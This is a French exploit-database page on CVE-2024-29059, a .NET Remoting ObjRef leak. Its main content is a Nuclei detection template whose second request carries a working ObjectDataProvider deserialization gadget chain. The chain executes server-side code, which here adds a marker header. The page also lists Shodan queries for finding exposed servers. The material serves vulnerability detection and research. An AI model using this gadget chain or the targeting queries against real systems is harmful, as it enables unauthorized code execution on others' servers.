Exploit matérialisé
CVE-2024-29059
HIGH KEV1 exploit(s) public(s) pour cette CVE, 1 matérialisé(s) avec leur code.
À des fins de recherche défensive uniquement. Ne testez que sur des systèmes que vous possédez ou pour lesquels vous détenez une autorisation écrite. L'accès non autorisé est illégal.
Nuclei
high Vérifié
Source
.NET Framework - Leaking ObjRefs via HTTP .NET Remoting
Par projectdiscovery
Comment tester cet exploit
Le template Nuclei EST le test : une règle de détection exécutable. Installez nuclei, puis lancez-le contre une cible que vous contrôlez.
nuclei -id CVE-2024-29059 -u https://your-target
Template yaml
id: CVE-2024-29059
info:
name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting
author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch
severity: high
description: .NET Framework Information Disclosure Vulnerability
impact: |
Attackers can exploit leaked ObjRefs to access remote objects via .NET Remoting, potentially gaining unauthorized access to application data.
remediation: |
Apply security patches for .NET Framework addressing CVE-2024-29059.
reference:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059
- https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/
- https://github.com/codewhitesec/HttpRemotingObjRefLeak
- https://github.com/NaInSec/CVE-LIST
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-29059
cwe-id: CWE-209
epss-score: 0.98624
epss-percentile: 0.99921
cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: microsoft
product: .net_framework
shodan-query:
- 'Server: MS .NET Remoting'
- "server: ms .net remoting"
tags: cve,cve2024,dotnet,microsoft,remoting,deserialization,kev,vkev,vuln
http:
- raw:
- |
GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
Host: {{Hostname}}
__RequestVerb: POST
Content-Type: text/xml
- |
POST {{objref}} HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">
<ForegroundBrush id="ref-3"><ObjectDataProvider MethodName="AddHeader"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:System="clr-namespace:System;assembly=mscorlib"
xmlns:System.Web="clr-namespace:System.Web;assembly=System.Web"><ObjectDataProvider.ObjectInstance><ObjectDataProvider MethodName="get_Response"><ObjectDataProvider.ObjectInstance>
<ObjectDataProvider ObjectType="{x:Type System.Web:HttpContext}" MethodName="get_Current" />
</ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>
</ObjectDataProvider.ObjectInstance>
<ObjectDataProvider.MethodParameters>
<System:String>X-Vuln-Test</System:String>
<System:String>{{randstr}}</System:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider></ForegroundBrush>
</a1:TextFormattingRunProperties>
</SOAP-ENV:Envelope>
extractors:
- type: regex
name: objref
part: body_1
group: 1
regex:
- "(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"
internal: true
- type: dsl
dsl:
- x_vuln_test
matchers:
- type: dsl
dsl:
- "contains(body_1,'ObjRef')"
- "contains(x_vuln_test,'{{randstr}}')"
condition: and
# digest: 4a0a004730450220106f1bbac47c459ce5bd993ff786fbf671f5d78445288a9ae5b9a770cdf69cf2022100d17c0439735b30f13647961141b2c9cd3b97683b9f72cd1904165efce66442c7:922c64590222798bb761d5b6d8e72950